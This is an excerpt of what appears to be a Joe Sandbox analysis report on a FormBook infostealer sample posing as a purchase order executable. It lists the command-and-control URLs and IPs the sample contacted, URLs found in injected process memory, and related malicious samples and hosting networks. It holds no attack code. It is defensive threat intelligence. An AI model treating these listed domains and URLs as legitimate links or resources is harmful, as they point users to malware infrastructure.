                                          http://www.gogawithme.live/6gtt/?cla=SGA0vAB7ljjiJZBksJb1gqec1i3dMNjZK6uCbLTCC3HP5ur0cn6Abe6/hzp/g4dh4YOAUYGeqr6sPYYs6bnbftG3TST47at8LnD6yWitNli0aOZiiyErkaGZ0ExcXW9KKA==&jbeXk=EHbdQPuXfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.smartcongress.net/11t3/false
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.acond-22-mvr.click/w9z4/?jbeXk=EHbdQPuX&cla=68uIQ7XuXrYyzH38eAwIlcni4Dy1meyAWnVnC6Q+cYkMiUv2YFR7SOjLNBcUXcnE4X2lRQ1sPBZfnUN4AIhfbeeWLm23HuUFOBNObgSjIwBxlFn7Rit3IOIP+ZrZsKx+FQ==false
                                          • Avira URL Cloud: malware
                                          unknown
                                          http://www.mrpokrovskii.pro/2pji/false
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.ampsamkok88.shop/huvt/?cla=yxXU4HpAbhaf+OkoYuih9i/g9QEw7HNYYa9VbkZ8i0eD7fFgPye8gqdK566WGP/XcS8CMkxomySFTtdD4uVPdmXJU5Nrv7tPj8ooy4ycuPqfNaJACPLoENW1kFMy7/pznQ==&jbeXk=EHbdQPuXfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.70kdd.top/klhq/false
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.70kdd.top/klhq/?cla=AHY/rhT5FAaHaOQwqTnzrcskZO2I+4brO2rEekNoUo4JX0G52JlH+4AuLBXgGUSDwTLgniL6s02sZcl+Gf8+ieDRvxIHzah5xLQe7b3R0zi9v/9+L2XqTgkk9lBsx9pauw==&jbeXk=EHbdQPuXfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.mrpokrovskii.pro/2pji/?cla=67iA4TPPdQ9nErotgeyL+Ya2EPxYwBsEvI1Cgt9ewFwChBdA65DXjWpTSdFtRBveCaF8GV/HBCb4pJoPY3YT9yZ96oMLsgfQ1G9JdO2EtcszdOb7L0lpI3ZCf/THH8NE8w==&jbeXk=EHbdQPuXfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.acond-22-mvr.click/w9z4/false
                                          • Avira URL Cloud: malware
                                          unknown
                                          http://www.llljjjiii.shop/rsvy/false
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.ampsamkok88.shop/huvt/false
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.gogawithme.live/6gtt/false
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.ytsd88.top/egqi/false
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.ytsd88.top/egqi/?cla=b73RclDzsQx9LNfVP0mvFBo4qCNcPXUUZl7U/15lM3StUAJAIINJCW5I+z7gQYXdXqIUVixe3UGJ61mgF9Q8ksZ6wdRJyvWXXW5woHrN3vUqlgOg2KxD9o0N2wzkcF8JdQ==&jbeXk=EHbdQPuXfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.54248711.xyz/jm2l/false
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.matteicapital.online/hyyd/false
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.matteicapital.online/hyyd/?jbeXk=EHbdQPuX&cla=fqlLWWUWU+rKW3EBskUV6SGgNRnmDoU2hpWkksgzCQayp6WkBROPj8SoyGxHGehCRFG0wA/ATtWP72Uz33qX2RXlPUSmGQTIeTj0jYuHFw88ATfT6HkRUZetCKkJWJDjJA==false
                                          • Avira URL Cloud: safe
                                          unknown
                                          NameSourceMaliciousAntivirus DetectionReputation
                                          https://duckduckgo.com/chrome_newtabpcaui.exe, 00000004.00000002.3894074077.00000000086EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://dts.gnpge.comolMdMEBIcgVB.exe, 00000006.00000002.3892138769.0000000003D40000.00000004.00000001.00040000.00000000.sdmpfalse
                                              high
                                              https://duckduckgo.com/ac/?q=pcaui.exe, 00000004.00000002.3894074077.00000000086EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://cdn.consentmanager.netpcaui.exe, 00000004.00000002.3892630131.0000000006750000.00000004.10000000.00040000.00000000.sdmp, olMdMEBIcgVB.exe, 00000006.00000002.3892138769.0000000003D40000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  high
                                                  http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2pcaui.exe, 00000004.00000002.3892630131.0000000006750000.00000004.10000000.00040000.00000000.sdmp, pcaui.exe, 00000004.00000002.3893996430.0000000008440000.00000004.00000800.00020000.00000000.sdmp, olMdMEBIcgVB.exe, 00000006.00000002.3892138769.0000000003D40000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    high
                                                    http://i2.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpgpcaui.exe, 00000004.00000002.3892630131.0000000006750000.00000004.10000000.00040000.00000000.sdmp, pcaui.exe, 00000004.00000002.3893996430.0000000008440000.00000004.00000800.00020000.00000000.sdmp, olMdMEBIcgVB.exe, 00000006.00000002.3892138769.0000000003D40000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      high
                                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=pcaui.exe, 00000004.00000002.3894074077.00000000086EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://www.bt.cn/?from=404pcaui.exe, 00000004.00000002.3892630131.00000000065BE000.00000004.10000000.00040000.00000000.sdmp, olMdMEBIcgVB.exe, 00000006.00000002.3892138769.0000000003BAE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                          high
                                                          http://i2.cdn-image.com/__media__/pics/28903/search.png)pcaui.exe, 00000004.00000002.3892630131.0000000006750000.00000004.10000000.00040000.00000000.sdmp, pcaui.exe, 00000004.00000002.3893996430.0000000008440000.00000004.00000800.00020000.00000000.sdmp, olMdMEBIcgVB.exe, 00000006.00000002.3892138769.0000000003D40000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            high
                                                            http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2pcaui.exe, 00000004.00000002.3892630131.0000000006750000.00000004.10000000.00040000.00000000.sdmp, pcaui.exe, 00000004.00000002.3893996430.0000000008440000.00000004.00000800.00020000.00000000.sdmp, olMdMEBIcgVB.exe, 00000006.00000002.3892138769.0000000003D40000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              high
                                                              https://www.google.compcaui.exe, 00000004.00000002.3892630131.0000000006108000.00000004.10000000.00040000.00000000.sdmp, olMdMEBIcgVB.exe, 00000006.00000002.3892138769.00000000036F8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                high
                                                                http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otfpcaui.exe, 00000004.00000002.3892630131.0000000006750000.00000004.10000000.00040000.00000000.sdmp, pcaui.exe, 00000004.00000002.3893996430.0000000008440000.00000004.00000800.00020000.00000000.sdmp, olMdMEBIcgVB.exe, 00000006.00000002.3892138769.0000000003D40000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  high
                                                                  http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otfpcaui.exe, 00000004.00000002.3892630131.0000000006750000.00000004.10000000.00040000.00000000.sdmp, pcaui.exe, 00000004.00000002.3893996430.0000000008440000.00000004.00000800.00020000.00000000.sdmp, olMdMEBIcgVB.exe, 00000006.00000002.3892138769.0000000003D40000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    high
                                                                    http://www.matteicapital.online/Capital.cfm?fp=rc9%2BBG3aoUzorBCa6%2F7nT8%2F3WEhQ2jcM0%2BP1SZmvSimxwpcaui.exe, 00000004.00000002.3892630131.0000000006750000.00000004.10000000.00040000.00000000.sdmp, pcaui.exe, 00000004.00000002.3893996430.0000000008440000.00000004.00000800.00020000.00000000.sdmp, olMdMEBIcgVB.exe, 00000006.00000002.3892138769.0000000003D40000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchpcaui.exe, 00000004.00000002.3894074077.00000000086EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eotpcaui.exe, 00000004.00000002.3892630131.0000000006750000.00000004.10000000.00040000.00000000.sdmp, pcaui.exe, 00000004.00000002.3893996430.0000000008440000.00000004.00000800.00020000.00000000.sdmp, olMdMEBIcgVB.exe, 00000006.00000002.3892138769.0000000003D40000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                        high
                                                                        http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefixpcaui.exe, 00000004.00000002.3892630131.0000000006750000.00000004.10000000.00040000.00000000.sdmp, pcaui.exe, 00000004.00000002.3893996430.0000000008440000.00000004.00000800.00020000.00000000.sdmp, olMdMEBIcgVB.exe, 00000006.00000002.3892138769.0000000003D40000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                          high
                                                                          https://delivery.consentmanager.netpcaui.exe, 00000004.00000002.3892630131.0000000006750000.00000004.10000000.00040000.00000000.sdmp, olMdMEBIcgVB.exe, 00000006.00000002.3892138769.0000000003D40000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            high
                                                                            http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eotpcaui.exe, 00000004.00000002.3892630131.0000000006750000.00000004.10000000.00040000.00000000.sdmp, pcaui.exe, 00000004.00000002.3893996430.0000000008440000.00000004.00000800.00020000.00000000.sdmp, olMdMEBIcgVB.exe, 00000006.00000002.3892138769.0000000003D40000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                              high
                                                                              http://www.matteicapital.online/Interest.cfm?fp=rc9%2BBG3aoUzorBCa6%2F7nT8%2F3WEhQ2jcM0%2BP1SZmvSimxpcaui.exe, 00000004.00000002.3892630131.0000000006750000.00000004.10000000.00040000.00000000.sdmp, pcaui.exe, 00000004.00000002.3893996430.0000000008440000.00000004.00000800.00020000.00000000.sdmp, olMdMEBIcgVB.exe, 00000006.00000002.3892138769.0000000003D40000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              http://www.54248711.xyzolMdMEBIcgVB.exe, 00000006.00000002.3893435430.00000000054A7000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              http://i2.cdn-image.com/__media__/pics/28905/arrrow.png)pcaui.exe, 00000004.00000002.3892630131.0000000006750000.00000004.10000000.00040000.00000000.sdmp, pcaui.exe, 00000004.00000002.3893996430.0000000008440000.00000004.00000800.00020000.00000000.sdmp, olMdMEBIcgVB.exe, 00000006.00000002.3892138769.0000000003D40000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                high
                                                                                http://www.matteicapital.online/Capital_Investment_Advisors.cfm?fp=rc9%2BBG3aoUzorBCa6%2F7nT8%2F3WEhpcaui.exe, 00000004.00000002.3892630131.0000000006750000.00000004.10000000.00040000.00000000.sdmp, pcaui.exe, 00000004.00000002.3893996430.0000000008440000.00000004.00000800.00020000.00000000.sdmp, olMdMEBIcgVB.exe, 00000006.00000002.3892138769.0000000003D40000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=pcaui.exe, 00000004.00000002.3894074077.00000000086EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://www.ecosia.org/newtab/pcaui.exe, 00000004.00000002.3894074077.00000000086EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regularpcaui.exe, 00000004.00000002.3892630131.0000000006750000.00000004.10000000.00040000.00000000.sdmp, pcaui.exe, 00000004.00000002.3893996430.0000000008440000.00000004.00000800.00020000.00000000.sdmp, olMdMEBIcgVB.exe, 00000006.00000002.3892138769.0000000003D40000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woffpcaui.exe, 00000004.00000002.3892630131.0000000006750000.00000004.10000000.00040000.00000000.sdmp, pcaui.exe, 00000004.00000002.3893996430.0000000008440000.00000004.00000800.00020000.00000000.sdmp, olMdMEBIcgVB.exe, 00000006.00000002.3892138769.0000000003D40000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://www.matteicapital.online/Working_Capital.cfm?fp=rc9%2BBG3aoUzorBCa6%2F7nT8%2F3WEhQ2jcM0%2BP1Spcaui.exe, 00000004.00000002.3892630131.0000000006750000.00000004.10000000.00040000.00000000.sdmp, pcaui.exe, 00000004.00000002.3893996430.0000000008440000.00000004.00000800.00020000.00000000.sdmp, olMdMEBIcgVB.exe, 00000006.00000002.3892138769.0000000003D40000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        http://www.matteicapital.online/__media__/js/trademark.php?d=matteicapital.online&type=nspcaui.exe, 00000004.00000002.3892630131.0000000006750000.00000004.10000000.00040000.00000000.sdmp, pcaui.exe, 00000004.00000002.3893996430.0000000008440000.00000004.00000800.00020000.00000000.sdmp, olMdMEBIcgVB.exe, 00000006.00000002.3892138769.0000000003D40000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        https://ac.ecosia.org/autocomplete?q=pcaui.exe, 00000004.00000002.3894074077.00000000086EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://i2.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpgpcaui.exe, 00000004.00000002.3892630131.0000000006750000.00000004.10000000.00040000.00000000.sdmp, pcaui.exe, 00000004.00000002.3893996430.0000000008440000.00000004.00000800.00020000.00000000.sdmp, olMdMEBIcgVB.exe, 00000006.00000002.3892138769.0000000003D40000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://i2.cdn-image.com/__media__/pics/29590/bg1.png)pcaui.exe, 00000004.00000002.3892630131.0000000006750000.00000004.10000000.00040000.00000000.sdmp, pcaui.exe, 00000004.00000002.3893996430.0000000008440000.00000004.00000800.00020000.00000000.sdmp, olMdMEBIcgVB.exe, 00000006.00000002.3892138769.0000000003D40000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttfpcaui.exe, 00000004.00000002.3892630131.0000000006750000.00000004.10000000.00040000.00000000.sdmp, pcaui.exe, 00000004.00000002.3893996430.0000000008440000.00000004.00000800.00020000.00000000.sdmp, olMdMEBIcgVB.exe, 00000006.00000002.3892138769.0000000003D40000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttfpcaui.exe, 00000004.00000002.3892630131.0000000006750000.00000004.10000000.00040000.00000000.sdmp, pcaui.exe, 00000004.00000002.3893996430.0000000008440000.00000004.00000800.00020000.00000000.sdmp, olMdMEBIcgVB.exe, 00000006.00000002.3892138769.0000000003D40000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://www.matteicapital.online/Raising_Capital_for_Business.cfm?fp=rc9%2BBG3aoUzorBCa6%2F7nT8%2F3WEpcaui.exe, 00000004.00000002.3892630131.0000000006750000.00000004.10000000.00040000.00000000.sdmp, pcaui.exe, 00000004.00000002.3893996430.0000000008440000.00000004.00000800.00020000.00000000.sdmp, olMdMEBIcgVB.exe, 00000006.00000002.3892138769.0000000003D40000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-boldpcaui.exe, 00000004.00000002.3892630131.0000000006750000.00000004.10000000.00040000.00000000.sdmp, pcaui.exe, 00000004.00000002.3893996430.0000000008440000.00000004.00000800.00020000.00000000.sdmp, olMdMEBIcgVB.exe, 00000006.00000002.3892138769.0000000003D40000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woffpcaui.exe, 00000004.00000002.3892630131.0000000006750000.00000004.10000000.00040000.00000000.sdmp, pcaui.exe, 00000004.00000002.3893996430.0000000008440000.00000004.00000800.00020000.00000000.sdmp, olMdMEBIcgVB.exe, 00000006.00000002.3892138769.0000000003D40000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://i2.cdn-image.com/__media__/js/min.js?v2.3pcaui.exe, 00000004.00000002.3892630131.0000000006750000.00000004.10000000.00040000.00000000.sdmp, pcaui.exe, 00000004.00000002.3893996430.0000000008440000.00000004.00000800.00020000.00000000.sdmp, olMdMEBIcgVB.exe, 00000006.00000002.3892138769.0000000003D40000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://www.Matteicapital.onlinepcaui.exe, 00000004.00000002.3892630131.0000000006750000.00000004.10000000.00040000.00000000.sdmp, pcaui.exe, 00000004.00000002.3893996430.0000000008440000.00000004.00000800.00020000.00000000.sdmp, olMdMEBIcgVB.exe, 00000006.00000002.3892138769.0000000003D40000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=pcaui.exe, 00000004.00000002.3894074077.00000000086EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://www.matteicapital.online/__media__/design/underconstructionnotice.php?d=matteicapital.onlinepcaui.exe, 00000004.00000002.3892630131.0000000006750000.00000004.10000000.00040000.00000000.sdmp, pcaui.exe, 00000004.00000002.3893996430.0000000008440000.00000004.00000800.00020000.00000000.sdmp, olMdMEBIcgVB.exe, 00000006.00000002.3892138769.0000000003D40000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefixpcaui.exe, 00000004.00000002.3892630131.0000000006750000.00000004.10000000.00040000.00000000.sdmp, pcaui.exe, 00000004.00000002.3893996430.0000000008440000.00000004.00000800.00020000.00000000.sdmp, olMdMEBIcgVB.exe, 00000006.00000002.3892138769.0000000003D40000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            • No. of IPs < 25%
                                                                                                            • 25% < No. of IPs < 50%
                                                                                                            • 50% < No. of IPs < 75%
                                                                                                            • 75% < No. of IPs
                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                            209.74.77.109
                                                                                                            www.gogawithme.liveUnited States
                                                                                                            31744MULTIBAND-NEWHOPEUSfalse
                                                                                                            146.88.233.115
                                                                                                            smartcongress.netFrance
                                                                                                            53589PLANETHOSTER-8CAfalse
                                                                                                            161.97.142.144
                                                                                                            www.54248711.xyzUnited States
                                                                                                            51167CONTABODEtrue
                                                                                                            103.21.221.87
                                                                                                            rtpterbaruwaktu3.xyzunknown
                                                                                                            9905LINKNET-ID-APLinknetASNIDtrue
                                                                                                            8.210.114.150
                                                                                                            www.llljjjiii.shopSingapore
                                                                                                            45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCfalse
                                                                                                            47.76.213.197
                                                                                                            www.ytsd88.topUnited States
                                                                                                            9500VODAFONE-TRANSIT-ASVodafoneNZLtdNZfalse
                                                                                                            199.59.243.227
                                                                                                            www.acond-22-mvr.clickUnited States
                                                                                                            395082BODIS-NJUSfalse
                                                                                                            208.91.197.27
                                                                                                            www.matteicapital.onlineVirgin Islands (BRITISH)
                                                                                                            40034CONFLUENCE-NETWORK-INCVGfalse
                                                                                                            38.47.232.124
                                                                                                            70kdd.topUnited States
                                                                                                            174COGENT-174USfalse
                                                                                                            194.85.61.76
                                                                                                            www.mrpokrovskii.proRussian Federation
                                                                                                            48287RU-CENTERRUfalse
                                                                                                            172.67.209.48
                                                                                                            www.ampsamkok88.shopUnited States
                                                                                                            13335CLOUDFLARENETUSfalse
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1560695
Start date and time: 2024-11-22 07:53:53 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 57s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name: Run with higher sleep bypass
Number of new started processes analysed: 7
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: PO #2411071822.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/3@13/11
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 97%
• Number of executed functions: 43
• Number of non-executed functions: 301
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps longer than 100000000ms are automatically reduced to 1000ms
• Sleep loops longer than 100000000ms are bypassed. Single calls with a delay of 100000000ms and higher are ignored
• Excluded processes from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Report creation exceeded the maximum time and may be missing disassembly code information.
• Report size exceeded the maximum capacity and may be missing disassembly code.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                            No simulations
                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            209.74.77.109Quotation.exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.gogawithme.live/6gtt/
                                                                                                            payments.exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.gogawithme.live/6gtt/
                                                                                                            A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.dailyfuns.info/n9b0/
                                                                                                            146.88.233.115Quotation.exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.smartcongress.net/11t3/
                                                                                                            payments.exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.smartcongress.net/11t3/
                                                                                                            161.97.142.144Quotation.exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.54248711.xyz/jm2l/
                                                                                                            payments.exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.54248711.xyz/jm2l/
                                                                                                            Quotation request -30112024_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.070002018.xyz/zffa/
                                                                                                            DHL SHIPPING CONFIRMATION-SAMPLES DELIVERY ADDRESS.exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.030003794.xyz/mpp6/
                                                                                                            PO-DC13112024_pdf.vbsGet hashmaliciousUnknownBrowse
                                                                                                            • www.030002350.xyz/wrcq/
                                                                                                            Arrival Notice.exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.030003452.xyz/7nfi/
                                                                                                            AWB_NO_907853880911.exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.030002059.xyz/er88/
                                                                                                            ByuoedHi2e.exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.030003582.xyz/7zm7/
                                                                                                            Shipping documents..exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.030002128.xyz/knx2/
                                                                                                            56ck70s0BI.exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.030002832.xyz/o2wj/
                                                                                                            103.21.221.87P030092024LANDWAY.exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.rtpterbaruwaktu3.xyz/v6un/
                                                                                                            8.210.114.150Quotation.exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.llljjjiii.shop/rsvy/
                                                                                                            payments.exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.llljjjiii.shop/rsvy/
                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            www.ampsamkok88.shopQuotation.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 172.67.209.48
                                                                                                            payments.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 172.67.209.48
                                                                                                            www.54248711.xyzQuotation.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 161.97.142.144
                                                                                                            payments.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 161.97.142.144
                                                                                                            www.llljjjiii.shopQuotation.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 8.210.114.150
                                                                                                            payments.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 8.210.114.150
                                                                                                            www.gogawithme.liveQuotation.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 209.74.77.109
                                                                                                            payments.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 209.74.77.109
                                                                                                            www.ytsd88.topQuotation.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 47.76.213.197
                                                                                                            payments.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 47.76.213.197
                                                                                                            Quotation request -30112024_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 47.76.213.197
                                                                                                            www.mrpokrovskii.proQuotation.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 194.85.61.76
                                                                                                            payments.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 194.85.61.76
                                                                                                            Item-RQF-9456786.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 109.70.26.37
                                                                                                            www.acond-22-mvr.clickQuotation.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 199.59.243.227
                                                                                                            payments.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 199.59.243.227
                                                                                                            www.matteicapital.onlineQuotation.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 208.91.197.27
                                                                                                            payments.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 208.91.197.27
Match | Associated Sample Name / URL | Detection | Threat Name | Context
LINKNET-ID-APLinknetASNID | Quotation.exe | malicious | FormBook | 103.21.221.87
LINKNET-ID-APLinknetASNID | payments.exe | malicious | FormBook | 103.21.221.87
LINKNET-ID-APLinknetASNID | SWIFT COPY 0028_pdf.exe | malicious | FormBook | 103.21.221.4
LINKNET-ID-APLinknetASNID | 5674656777985-069688574654 pdf.exe | malicious | FormBook | 103.21.221.4
LINKNET-ID-APLinknetASNID | owari.ppc.elf | malicious | Unknown | 139.65.64.42
LINKNET-ID-APLinknetASNID | dvwkja7.elf | malicious | Mirai | 139.255.236.143
LINKNET-ID-APLinknetASNID | FOTO#U011eRAFLAR.exe | malicious | FormBook | 103.21.221.4
LINKNET-ID-APLinknetASNID | amen.arm6.elf | malicious | Mirai | 139.255.236.186
LINKNET-ID-APLinknetASNID | amen.m68k.elf | malicious | Unknown | 139.43.9.147
LINKNET-ID-APLinknetASNID | sora.mips.elf | malicious | Mirai | 139.255.236.186
PLANETHOSTER-8CA | Quotation.exe | malicious | FormBook | 146.88.233.115
PLANETHOSTER-8CA | payments.exe | malicious | FormBook | 146.88.233.115
PLANETHOSTER-8CA | https://texasbarcle.com/CLE/AAGateway.asp?lRefID=19203&sURL=https://famezik.com/#Zi5waWNhc3NvJG1hcmxhdGFua2Vycy5ncg== | malicious | Unknown | 146.88.234.239
PLANETHOSTER-8CA | EVCPUSBND147124_MBL Check_revised.exe | malicious | FormBook, PureLog Stealer | 199.16.129.175
PLANETHOSTER-8CA | Yb6ztdvQaB.elf | malicious | Unknown | 85.236.153.44
PLANETHOSTER-8CA | Remittance advice.exe | malicious | FormBook, PureLog Stealer | 199.16.129.175
PLANETHOSTER-8CA | https://serwer2464839.home.pl/imodzeb4 | malicious | Unknown | 146.88.233.222
PLANETHOSTER-8CA | 3Lf408k9mg.exe | malicious | PureLog Stealer, SystemBC | 146.88.232.72
PLANETHOSTER-8CA | https://gsdgroup.ca/ | malicious | Unknown | 199.16.129.142
PLANETHOSTER-8CA | http://amundsenscience.com | malicious | Unknown | 199.59.247.234
MULTIBAND-NEWHOPEUS | Quotation.exe | malicious | FormBook | 209.74.77.109
MULTIBAND-NEWHOPEUS | payments.exe | malicious | FormBook | 209.74.77.109
MULTIBAND-NEWHOPEUS | Mandatory Notice for all December Leave and Vacation application.exe | malicious | FormBook | 209.74.77.108
MULTIBAND-NEWHOPEUS | http://mt6j71.p1keesoulharmony.com/ | malicious | HTMLPhisher, EvilProxy | 209.74.95.101
MULTIBAND-NEWHOPEUS | CV_ Filipa Barbosa.exe | malicious | FormBook | 209.74.77.108
MULTIBAND-NEWHOPEUS | RFQ 3100185 MAHAD.exe | malicious | FormBook | 209.74.77.107
MULTIBAND-NEWHOPEUS | A2028041200SD.exe | malicious | FormBook | 209.74.77.109
MULTIBAND-NEWHOPEUS | https://hmjpvx0wn1.gaimensebb.shop/ | malicious | EvilProxy, HTMLPhisher | 209.74.95.101
MULTIBAND-NEWHOPEUS | Order No 24.exe | malicious | FormBook | 209.74.64.58
